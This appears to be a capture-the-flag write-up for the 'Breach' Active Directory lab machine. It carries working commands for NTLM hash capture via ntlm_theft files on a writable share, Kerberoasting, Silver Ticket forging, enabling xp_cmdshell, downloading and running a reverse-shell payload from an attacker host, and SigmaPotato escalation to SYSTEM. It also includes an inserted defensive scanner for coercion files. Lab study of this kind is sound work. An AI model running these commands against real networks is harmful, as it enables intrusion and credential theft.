Overview
Breach is an Active Directory machine that demonstrates how write access to an SMB share can be abused to capture NTLMv2 authentication, leading to Kerberoasting, MSSQL Silver Ticket abuse, command execution through xp_cmdshell, and final escalation through SeImpersonatePrivilege.
Attack Chain
- Enumerate exposed services and identify the breach.vl domain
- Use netexec RID brute forcing to build a user list
- Discover a writable SMB share as Guest
- Upload ntlm_theft payloads to trigger outbound authentication
- Capture and crack Julia.Wong's NTLMv2 hash
- Kerberoast svc_mssql and crack the service account password
- Generate a Silver Ticket for the MSSQL service
- Authenticate to MSSQL as Administrator using Kerberos
- Enable xp_cmdshell and gain command execution as svc_mssql
- Catch a reverse shell and read the local flag
- Abuse SeImpersonatePrivilege with SigmaPotato
- Gain NT AUTHORITY\SYSTEM and read the root flag
Enumeration
Port Scanning
We start by defining the target and running a full TCP port scan to identify the exposed services.
export IP=10.10.110.194; export NAME=BREACH; echo $IP; echo $NAME; ping $IP -c 1
nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME
ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports
nmap $IP -p$ports -Pn --disable-arp-ping -A -oA scans/nmap_initial_$NAME -v
The open TCP ports are:
53,80,135,139,445,3269,3389,5985,49664,49667,49670,51702

Findings
The exposed services indicate a Windows Active Directory target. DNS (53), SMB (139, 445), the Global Catalog over SSL on 3269, RDP (3389), and WinRM (5985) are available. The scan also identifies the domain as breach.vl and the domain controller as breachdc.breach.vl.
The domain and host are added to /etc/hosts for reliable name resolution.
echo "$IP breach.vl breachdc.breach.vl" | sudo tee -a /etc/hosts
Web Enumeration
Default IIS Page
Browsing to port 80 shows the default IIS landing page.

There is nothing immediately useful on the web service, so the focus shifts to SMB.
SMB Enumeration
RID Brute Force
With SMB exposed, we first try to enumerate domain users through RID brute forcing with netexec while authenticating as Guest with a blank password.
nxc smb $IP -u 'Guest' -p '' -d breach.vl --rid-brute | grep -i "sidtypeuser"
This returns several domain users.

The output is cleaned into a simple username list for later spraying and authentication testing.
cat creds/users_netexec.txt | awk -F'\\\\' '{print $2}' | awk '{print $1}' > creds/users_verified.txt

Testing the usernames as passwords does not return any valid credentials, so we continue with share enumeration.
nxc smb $IP -u 'Guest' -p '' -d breach.vl --shares
The share named share stands out because Guest has write access to it.

Writable Share
We connect to the share with smbclient.
smbclient //$IP/share --user='Guest' --password=''
Inside the share, the transfer directory is accessible. The user directories are not readable, but the writable location gives us a useful attack path.

Writable SMB shares can often be abused by placing files that trigger outbound authentication when viewed or indexed by a user. Instead of trying to upload a reverse shell directly, we can attempt to capture NTLMv2 hashes.
Foothold
NTLM Capture with ntlm_theft
For the hash capture attempt, we use ntlm_theft, which generates multiple common file types that reference an attacker-controlled SMB listener.
https://github.com/Greenwolf/ntlm_theft
python3 ~/Tools/ntlm_theft/ntlm_theft.py -g all -s 10.8.6.99 -f malConfig
The tool generates several payload files.

Next, Responder is started in analysis mode to listen for incoming authentication attempts.
sudo responder -I tun0 -A
Back in smbclient, we upload the generated files into the writable share/transfer location. The .scf file does not produce a response, but the .lnk file triggers an authentication attempt almost immediately.
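From the defender's side, the files ntlm_theft drops are straightforward to hunt for: a .scf, .url or .lnk sitting on a share whose icon path is a UNC reference to a host that is not one of your own file servers. The scanner below is an added example, not part of the original writeup; it assumes the share is mounted at a local path, uses an assumed allowlist TRUSTED_HOSTS (breachdc here), and the sample files it creates in a temporary directory are constructed.

```python
import re
import tempfile
from pathlib import Path

# File types Windows Explorer renders with a remote icon, which coerces outbound SMB auth.
COERCION_EXTENSIONS = {".lnk", ".scf", ".url", ".library-ms", ".theme"}

# Assumed allowlist: hosts that files on this share may legitimately reference.
TRUSTED_HOSTS = {"breachdc", "breachdc.breach.vl"}

# "\\host\" as plain ASCII (.scf/.url are text) and as UTF-16LE (how .lnk embeds its icon path).
_ASCII_UNC = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\")
_UTF16_UNC = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)\\\x00")

def unc_hosts(blob: bytes) -> set[str]:
    """Every host named in a \\host\share reference found anywhere in the file bytes."""
    hosts = {m.group(1).decode("ascii") for m in _ASCII_UNC.finditer(blob)}
    hosts |= {m.group(1).decode("utf-16-le") for m in _UTF16_UNC.finditer(blob)}
    return {h.lower() for h in hosts}

def untrusted_hosts(blob: bytes, trusted=TRUSTED_HOSTS) -> set[str]:
    """Referenced hosts that are not on the allowlist (case-insensitive)."""
    allow = {t.lower() for t in trusted}
    return {h for h in unc_hosts(blob) if h not in allow}

def scan_share(root: Path, trusted=TRUSTED_HOSTS) -> list[tuple[str, set[str]]]:
    """Walk a mounted share; report coercion-capable files that point at untrusted hosts."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in COERCION_EXTENSIONS:
            bad = untrusted_hosts(path.read_bytes(), trusted)
            if bad:
                findings.append((str(path.relative_to(root)), bad))
    return findings

if __name__ == "__main__":
    # Constructed samples: an .scf and a .lnk-like blob whose icon lives on an outside host,
    # plus a benign .url that points at the domain controller.
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp) / "transfer"
        share.mkdir()
        (share / "malConfig.scf").write_text(
            "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.8.6.99\\share\\icon.ico\r\n")
        (share / "malConfig.lnk").write_bytes(
            b"L\x00\x00\x00" + "\\\\10.8.6.99\\share\\icon.ico".encode("utf-16-le"))
        (share / "intranet.url").write_text(
            "[InternetShortcut]\r\nIconFile=\\\\breachdc\\netlogon\\site.ico\r\n")
        for name, hosts in scan_share(share):
            print(f"{name}: references untrusted host(s) {sorted(hosts)}")
```

Run it periodically against shares where Guest or Everyone can write, and treat any hit as an authentication-coercion attempt rather than a stray shortcut.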

Responder captures an NTLMv2 hash for Julia.Wong.

The hash is saved locally for cracking.

john --wordlist=/usr/share/wordlists/rockyou.txt creds/julia_wong_ntlm.hash
The password is recovered successfully.

Julia.Wong:Computer1
Password Reuse Check
The recovered password is sprayed against the verified user list to check for reuse.
nxc smb $IP -u creds/users_verified.txt -p 'Computer1' -d breach.vl --continue-on-success
Only Julia.Wong validates with this password.

Kerberoasting svc_mssql
With valid domain credentials, we check for Kerberoastable accounts using impacket-GetUserSPNs.
impacket-GetUserSPNs -dc-ip $IP breach.vl/Julia.Wong:Computer1 -request
The request returns a krb5tgs hash for svc_mssql.

The hash is saved locally.

Then it is cracked with john.
john --wordlist=/usr/share/wordlists/rockyou.txt creds/svc_mssql.hash

The recovered service account credentials are:
svc_mssql:Trustno1
The credentials are tested with netexec. The account validates over SMB, RDP, and MSSQL, but it does not immediately provide a shell.

Active Directory Enumeration
BloodHound Collection
Since we have valid credentials but no obvious shell access, we collect Active Directory data with bloodhound-python.
bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -ns $IP -dc breachdc.breach.vl -c All --zip

The same collection is run with the svc_mssql account.
bloodhound-python -d breach.vl -u 'svc_mssql' -p 'Trustno1' -ns $IP -dc breachdc.breach.vl -c All --zip

BloodHound does not reveal an obvious privilege escalation path. Since svc_mssql is tied to MSSQL and the service is accessible, the next path is to forge a service ticket for MSSQL.
MSSQL Silver Ticket
Required Values
To forge a Silver Ticket for the MSSQL service, we need three values:
- The NT hash of the service account password
- The domain SID
- The target SPN
Because we want to access the MSSQL service from our attacking machine, impacket-ticketer is used to generate a Kerberos service ticket.
Service Account NT Hash
First, we generate the NT hash for the svc_mssql password, Trustno1.
echo -n "Trustno1" | iconv -t UTF-16LE | openssl md4

69596c7aa1e8daee17f8e78870e25a5c
Domain SID
The domain SID is retrieved over LDAP with netexec.
nxc ldap $IP -u 'svc_mssql' -p 'Trustno1' -d breach.vl -k --get-sid

S-1-5-21-2330692793-3312915120-706255856
MSSQL SPN
The target SPN can be retrieved with impacket-GetUserSPNs without the -request flag.
impacket-GetUserSPNs -dc-ip $IP breach.vl/Julia.Wong:Computer1

MSSQLSvc/breachdc.breach.vl:1433
Generating the Silver Ticket
With the NT hash, domain SID, domain name, and SPN, we forge a service ticket as Administrator.
impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c \
-domain-sid S-1-5-21-2330692793-3312915120-706255856 \
-domain breach.vl \
-spn MSSQLSvc/breachdc.breach.vl:1433 \
Administrator
The ticket is generated as Administrator.ccache.

The ticket is loaded into the current environment and checked with klist.
export KRB5CCNAME=./Administrator.ccache
klist

Kerberos configuration also needs to resolve the domain and KDC correctly. Update or create /etc/krb5.conf with the required realm and host details.

MSSQL Access as Administrator
Using the forged Kerberos ticket, we authenticate to MSSQL as Administrator.
impacket-mssqlclient -k -no-pass breach.vl/Administrator@breachdc.breach.vl -windows-auth
The connection succeeds.

We check whether the session has sysadmin privileges.
select IS_SRVROLEMEMBER ('sysadmin')
The query returns True.

Enabling xp_cmdshell
With sysadmin privileges, xp_cmdshell can be enabled.
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell whoami;
Commands execute as svc_mssql.

Reverse Shell as svc_mssql
A listener is started on the attacking machine with rlwrap and nc on port 443. Then rcat is transferred to C:\ProgramData through xp_cmdshell.
xp_cmdshell powershell -c iwr -uri http://10.8.6.99/rcat.exe -Outfile c:\ProgramData\rcat_10.8.6.99_443.exe

We confirm that the payload was written successfully.
xp_cmdshell cmd /c dir c:\ProgramData

The payload is executed through xp_cmdshell.
xp_cmdshell cmd /c c:\ProgramData\rcat_10.8.6.99_443.exe

A shell is received as svc_mssql.

The local flag can now be read.
type C:\Users\svc_mssql\Desktop\local.txt

Privilege Escalation
Privilege Enumeration
From the svc_mssql shell, we inspect the assigned privileges.
whoami /priv
SeManageVolumePrivilege and SeImpersonatePrivilege are enabled.

SeImpersonatePrivilege gives us a path to escalate with a Potato-style exploit. In this case, SigmaPotato is used.
https://github.com/tylerdotrar/SigmaPotato/releases
SigmaPotato
Transfer SigmaPotato.exe to the target.
iwr -uri http://10.8.6.99/SigmaPotato.exe -Outfile c:\ProgramData\SigmaPotato.exe

We test command execution first with whoami.
cmd /c c:\ProgramData\SigmaPotato.exe whoami
The command runs as nt authority\system.

SYSTEM Shell
A new listener is started on port 443, and the same rcat payload is executed through SigmaPotato.
cmd /c c:\ProgramData\SigmaPotato.exe "cmd /c c:\ProgramData\rcat_10.8.6.99_443.exe"

This returns a shell as NT AUTHORITY\SYSTEM.

The root flag can now be read.
type C:\Users\Administrator\Desktop\root.txt

Key Takeaways
Breach shows how a seemingly low-impact writable SMB share can become the start of a full compromise chain. By placing files that trigger outbound authentication, we captured and cracked a user’s NTLMv2 hash, then used those credentials to Kerberoast svc_mssql. The MSSQL service account enabled a Silver Ticket attack, which provided administrative MSSQL access and command execution through xp_cmdshell. The final escalation came from SeImpersonatePrivilege, allowing SigmaPotato to execute commands as NT AUTHORITY\SYSTEM.